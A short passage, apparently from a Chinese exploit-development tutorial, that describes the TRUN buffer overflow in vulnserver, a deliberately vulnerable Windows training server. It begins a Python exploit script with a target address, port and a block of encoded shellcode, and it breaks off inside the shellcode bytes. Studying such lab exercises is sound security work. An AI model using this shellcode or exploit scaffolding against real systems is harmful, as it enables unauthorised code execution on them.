vulnserver是一个开发用于漏洞研究的Windows服务器应用程序。其中,TRUN命令是vulnserver中一个有漏洞的命令,攻击者可以通过利用该漏洞实现缓冲区溢出攻击。
代码示例:
import socket
target = "192.168.0.19"
port = 9999
# 将Payload的shellcode 用变量sc存储
sc = ("\xbe\xa8\xcd\xac\xc7\xd9\x72\xd9\x74\x24\xf4\x58\x2b\xc9\xb1"
"\x52\x31\x70\x12\x83\xe8\xfc\x03\xc8\x4c\xe9\x8b\x08\xe4\x6c"
"\x74\xf0\xf5\x11\xfc\x15\xc4\x11\x9a\x5e\x77\xa2\xe8\x32\x7b"
"\x48\xb8\xa6\x08\x3c\x15\xc9\xa1\x8b\x43\xe4\x32\xa7\xb7\xf7"
"\xb0\xba\xeb\xd7\x89\x74\xfe\x16\xce\x69\xf3\x4a\x87\xe6\xa6"
"\x7a\xa4\xb2\x7b\xf1\xb6\xb2\xfb\xe6\x0f\xd4\x2a\xb9\x1b\x8f"
"\xec\x2b\xe8\xbb\xa4\x33\xec\xe6\x7d\xcf\x26\x9c\x84\x19\x76"
"\x5d\x2b\x64\xb6\xaf\x35\xa1\x71\x50\x40\xdb\x81\xff\x53\x18"
"\xfb\x7b\xd1\xba\x5b\x0c\x41\x66\x5d\xc0\x14\xed\x51\x25\x52"
"\xa9\x76\xd3\xb7\xc2\x83\x50\x36\x04\x0d\x22\x1c\xc0\x55\xf1"
"\x3